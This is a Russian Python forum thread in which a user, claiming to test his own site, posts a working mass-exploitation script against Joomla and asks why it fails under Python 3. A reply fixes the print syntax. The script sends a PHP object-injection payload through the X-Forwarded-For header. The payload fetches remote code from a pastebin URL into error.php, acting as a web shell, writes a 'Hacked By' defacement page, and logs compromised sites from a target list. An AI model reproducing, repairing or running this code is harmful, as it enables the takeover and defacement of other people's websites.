Уведомления

Группа в Telegram: @pythonsu

#1 Апрель 3, 2017 15:39:34

Vasilich
Зарегистрирован: 2017-04-03
Сообщения: 1
Репутация: +  0  -
Профиль   Отправить e-mail  

Помогите найти ошибку в коде

Здравствуйте. Хочу протестировать свой сайт на устойчивость к эксплоиту, код которого приведён чуть ниже ниже.
У меня стоит интерпретатор Python 3
Вызываю скрипт командой:
“script.py site.txt”
В файле site.txt в первой строчке казан адрес для тестируемого сайта: http://site.ru
При запуске скрипта через командную строку выдаётся ошибка:

 line 48
    print get_url(i, pl)
                ^
SyntaxError: invalid syntax

Подскажите, в чём может быть проблема?
Видео , откуда брал информацию:
https://www.youtube.com/watch?v=uw3J0S3iM3w

Вот сам код скрипта
 import requests #  easy_install requests
import requests
import subprocess
import argparse
import sys
import base64
fil=open(sys.argv[1],"r")
def get_url(url, user_agent):
  
    headers = {
    'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests
    'x-forwarded-for': user_agent   # X-Forwarded-For header instead of UA
    }
    cookies = requests.get(url,headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers,cookies=cookies)    
    return response
 
 
def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
  
    return encoded[:-1]
 
  
def generate_payload(php_payload):
  
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
  
    terminate = '\xf0\xfd\xfd\xfd';
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  
    return exploit_template
 
 
pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/error.php','w+'),file_get_contents('http://pastebin.com/raw/erWEmwib')); fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Gaza.html','w+'),'Hacked By Anonymous Ghost Gaza');")
for i in fil.readlines():
  try:
    i=i.strip()
    print get_url(i, pl)
    lala=requests.get(i+"/Gaza.html")
    if "Hacked" in lala.content:
     z=open('Joomla_3.5_Shell.txt','a')
     z.write(i+"/Gaza.html\n")
     z.close()
  except:
    pass
    
fil.close()

Офлайн

#2 Апрель 3, 2017 17:22:11

PEHDOM
Зарегистрирован: 2016-11-28
Сообщения: 2196
Репутация: +  294  -
Профиль   Отправить e-mail  

Помогите найти ошибку в коде

на ютубе скорее всего пример для второго пайтона, у вас третий в третьем принт это функция

 print(get_url(i, pl))



==============================
Помещайте код в теги:
[code python][/code]
Бериегите свое и чужое время.

Офлайн

Board footer

Модераторировать

Powered by DjangoBB

Lo-Fi Version